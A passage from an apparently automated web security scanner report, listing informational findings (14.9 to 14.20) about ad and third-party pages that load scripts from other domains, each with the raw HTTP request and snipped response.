GET /html.ng/site=cnn_money&cnn_money_pagetype=story_sync&cnn_money_position=475x215_bot&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&bizo_ind=business_services&tile=1313433990029&page.allowcompete=yes&domId=766274 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 2722
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_cnn_adsonar.js"></script>
...[SNIP]...

14.9. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks¶ms.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=markets_and_stocks&params.styles=fs&tile=1313434014105&page.allowcompete=yes&domId=506627 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:46 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:46 GMT
Pragma: no-cache
Content-Length: 2583
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
<!--FlightID: 352507-->
<script language="javascript" src="http://ad.insightexpressai.com/adserver/adServer.aspx?publisherID=236"></script>
...[SNIP]...

14.10. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo¶ms.styles=fs&domId=566446&page.allowcompete=yes&domId=566446  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=markets_and_stocks&cnn_money_section=quigo&params.styles=fs&domId=566446&page.allowcompete=yes&domId=566446 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639; WSOD%5FxrefSymbol=GOOG; WSOD%5FcompareToSP500=0; WSOD%5FcompareToCategory=0

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:29 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:46:29 GMT
Pragma: no-cache
Content-Length: 2754
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_cnn_adsonar.js"></script>
...[SNIP]...

14.11. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /html.ng/site=cnn_money&cnn_money_position=220x200_ctr&cnn_money_rollup=technology&cnn_money_section=quigo&params.styles=fs&page.allowcompete=yes&tile=1313433990029&page.allowcompete=yes&domId=969072 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; s_cc=true; s_sq=%5B%5BB%5D%5D; NGUserID=aa55a22-30407-167278533-1; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:45:35 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad4:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Mon, 15 Aug 2011 18:45:35 GMT
Pragma: no-cache
Content-Length: 2719
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
</script><script language="JavaScript" src="http://js.adsonar.com/js/tw_cnn_adsonar.js"></script>
...[SNIP]...

14.12. http://ads.pubmatic.com/HostedThirdPartyPixels/TF/ae_12232010.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pubmatic.com
Path:   /HostedThirdPartyPixels/TF/ae_12232010.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /HostedThirdPartyPixels/TF/ae_12232010.html HTTP/1.1
Host: ads.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; SyncRTB=1_1313513067.2_1313519152.3_1313519152.4_1314642352.5_1314642352.6_1314642352.7_1313519152; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; _curtime=1313432705; KTPCACOOKIE=YES; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; KTPCACOOKIE=YES; SYNCUPPIX_ON=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:41:25 GMT
Expires: Mon, 15 Aug 2011 19:42:50 GMT
Last-Modified: Tue, 29 Mar 2011 14:07:54 GMT
Cache-Control: max-age=172800
Content-Type: text/html; charset=UTF-8
ETag: "7b47ce-1da-961de280"
Accept-Ranges: bytes
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Content-Length: 474

<html>

<body>
<script type="text/javascript"><!--
e9 = new Object();
e9.size = "1x1";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/PubmaticAE/AudienceSelect/tags.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/AudienceSelectPublishers/AudienceSelect/tags.js"></script>
...[SNIP]...

14.13. http://afe.specificclick.net/serve/v=5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afe.specificclick.net
Path:   /serve/v=5

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /serve/v=5;m=3;l=12915;c=171139;b=1014305;ts=20110815142410 HTTP/1.1
Host: afe.specificclick.net
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ug=YMP06JsA7quIjC; JSESSIONID=eafc440c2493ffe3af4cd0b47975

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Cache-Control: no-store,no-cache,must-revalidate,post-check=0,pre-check=0
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: JSESSIONID=eb23298ece5b80ae456717e9cc54; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Mon, 15 Aug 2011 18:26:49 GMT
Vary: Accept-Encoding
Content-Length: 1490
Connection: Keep-Alive

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0
...[SNIP]...
<img src="http://cache.specificmedia.com/creative/blank.gif?ts=20110815142650&cmxid=2101.020017113901014305xmc" style="display: none" height="1" width="1" border="0" /><script type="text/javascript" src="http://pixel.adsafeprotected.com/jspix?anId=144&pubId=12915&campId=171139"></script>
...[SNIP]...

14.14. http://answers.ask.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://answers.ask.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: answers.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.3.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI2OjUxLVVUQw%3D%3D&po=0&pp=dir; qc=0; wz_sid=084EE34C926D4254193520127E77B26A

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:27:58 GMT
Server: Apache
Last-Modified: Tue, 29 Mar 2011 04:47:46 GMT
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Content-Length: 48976

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<title>Ask Answers - Answers.Ask.com</title>
<meta name="verify-v1" content="TkRJJdxRBRlUBJq2XM3E2j5apbCR8cQa
...[SNIP]...
f ad objects. Once that array has been populated,
                                        * the JavaScript will call the google_ad_request_done
                                        * function to display the ads.
                                        */
                                       -->
                                       <script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

14.15. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:52 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: ffadult_who=r,IPDnYK9LPElKtOp23iKt5ZzHGR0dtCKllPHqgsvcj13fvkskx4bbQm6F66eDPa410PU86fLd7lbFcIw26rWp9pjKfhvAZsbS2AIta07UzdIhBLLebh/pcIK3wr/3oE8b39ayFOf7NFF/h_LYDH4RXZke/zyv/4Sk5cy5VpAJ9mHO3/Utt0cMZnVylsjqLZD3; path=/; domain=.adultfriendfinder.com
Set-Cookie: v_hash=_english_13029; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: IP_COUNTRY=United States; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: ffadult_tr=r,Gf4cx0MBS68uu5LLsiToqHGKORZFXs5PWa_XSBvVwwhoujBG4d6PjPbjfuqQG_Kk; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: LOCATION_FROM_IP=country&United+States&area_code&214&longitude&-96.8207&country_name&United+States&lat&32.7825&country_code&US&region&TX&state&Texas&zip&75207&city&Dallas&postal_code&75207&latitude&32.7825&lon&-96.8207&dma_code&623&country_code3&USA; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
Set-Cookie: HISTORY=20110815-2-Dk1; path=/; domain=.adultfriendfinder.com; expires=Wed, 14-Sep-2011 19:05:52 GMT
ETag: TESTBED
P3P: CP="DSP LAW"
X-ApacheServer: ki26-18.friendfinderinc.com
Vary: Accept-Encoding
Content-Length: 13347
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="canonical" href
...[SNIP]...
<div align="center">
<script type="text/javascript" src="http://graphics.pop6.com/javascript/live/rm_swfobject-1287617202.js"></script>
...[SNIP]...

14.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pagead/ads?client=ca-pub-1644008520393294&output=html&h=90&slotname=9046130370&w=728&ea=0&flash=10.3.183&url=http%3A%2F%2Fpop6.com%2Fp%2Fmemsearch.cgi&dt=1313434739367&bpp=3&shv=r20110803&jsv=r20110719&correlator=1313434740483&frm=8&adk=2998568002&ga_vid=488407081.1313434615&ga_sid=1313434615&ga_hid=1935412276&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=18&u_nmime=94&dff=times%20new%20roman&dfs=16&biw=-12245933&bih=-12245933&ifk=2713277859&fu=0&ifi=1&dtd=1138 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=2227345e2d010064||t=1310132120|et=730|cs=002213fd480393eab1c1392bb9

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 15 Aug 2011 19:05:41 GMT
Server: cafe
Cache-Control: private
Content-Length: 3994
X-XSS-Protection: 1; mode=block

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110803/r20110719/abg.js"></script>
...[SNIP]...

14.17. http://graphics.friendfinder.com/javascript/live/ff-domLoadEvent-1284506173.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://graphics.friendfinder.com
Path:   /javascript/live/ff-domLoadEvent-1284506173.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /javascript/live/ff-domLoadEvent-1284506173.js HTTP/1.1
Host: graphics.friendfinder.com
Proxy-Connection: keep-alive
Referer: http://pop6.com/p/memsearch.cgi
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 21 Jul 2011 07:18:36 GMT
Vary: Accept-Encoding
Content-Length: 1016
Content-Type: text/javascript
X-Cache-Lookup: HIT from origin.friendfinderinc.com:3128
Expires: Sat, 20 Aug 2011 07:17:52 GMT
Date: Mon, 15 Aug 2011 18:57:59 GMT
Connection: close

addDOMLoadEvent=(function(){var load_events=[],load_timer,script,done,exec,old_onload,init=function(){done=true;clearInterval(load_timer);while(exec=load_events.shift())
exec();if(script)script.onread
...[SNIP]...
tion(func){if(done)return func();if(!load_events[0]){if(document.addEventListener)
document.addEventListener("DOMContentLoaded",init,false);/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

14.18. http://hire.jobvite.com/CompanyJobs/Careers.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /CompanyJobs/Careers.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/news?o=0&l=dir&qsrc=168&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: http-cookie-8hr=R3814240431; path=/; expires=Tue, 16-Aug-2011 02:30:44 GMT
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:28:03 GMT
Content-Length: 51311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<link href="careers_1.css"
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.linkedin.com/companyInsider?script&useBorder=no"></script>
...[SNIP]...

14.19. http://hire.jobvite.com/widget20.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hire.jobvite.com
Path:   /widget20.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /widget20.js?v=68 HTTP/1.1
Host: hire.jobvite.com
Proxy-Connection: keep-alive
Referer: http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&cs=93q9Vfwh&su=fsY9Vfwe&page=Job%20Description&j=oRqPVfwL
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=197432630.368055241.1313432945.1313432945.1313432945.1; __utmb=197432630.2.10.1313432945; __utmc=197432630; __utmz=197432630.1313432945.1.1.utmcsr=ask|utmccn=(organic)|utmcmd=organic|utmctr=xss; __utmv=197432630.|1=UserId=c0d7ec62-d5a9-4742-877b-e051c1fca917=1,2=CompanyId=qXY9VfwJ=1,3=SubsidiaryId=fsY9Vfwe=1; http-cookie-8hr=R3814240431; ASP.NET_SessionId=550nokfur4olvw55sph4c3ry; guestidc=11b0349d-31a4-41e3-8517-100f84ee11e4

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=604800
Content-Type: application/x-javascript
Last-Modified: Fri, 15 Apr 2011 18:44:22 GMT
Accept-Ranges: bytes
ETag: "07a7229dfbcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 15 Aug 2011 18:37:29 GMT
Content-Length: 41122

/*
* COPYRIGHT 2011 Jobvite, Inc. All rights reserved. This copyright notice is Copyright Management
* Information under 17 USC 1202 and is included to protect this work and deter copyright infringem
...[SNIP]...

       jvwidgetbaseurl = jvwidgetbaseurl.substring(0, p + 1);

//Raj adding fb connectivity for ssl sites
   var pos = jvwidgetbaseurl.indexOf('https')
   if(pos >= 0)
document.writeln('<script src="https://www.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>');
else
document.writeln('<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...

14.20. http://ipr.cntv.cn/english/group/index.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ipr.cntv.cn
Path:   /english/group/index.shtml

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /english/group/index.shtml HTTP/1.1
Host: ipr.cntv.cn
Proxy-Connection: keep-alive
Referer: http://ipr.cntv.cn/english/no1/index.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vjuids=-37556c840.131cebcf918.0.6033fa55; vjlast=1313433516.1313433516.30

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
X-UA-Compatible: IE=EmulateIE7
Content-Length: 5209
Content-Type: text/html
Cache-Control: max-age=120
Expires: Mon, 15 Aug 2011 18:39:44 GMT
Date: Mon, 15 Aug 2011 18:37:44 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
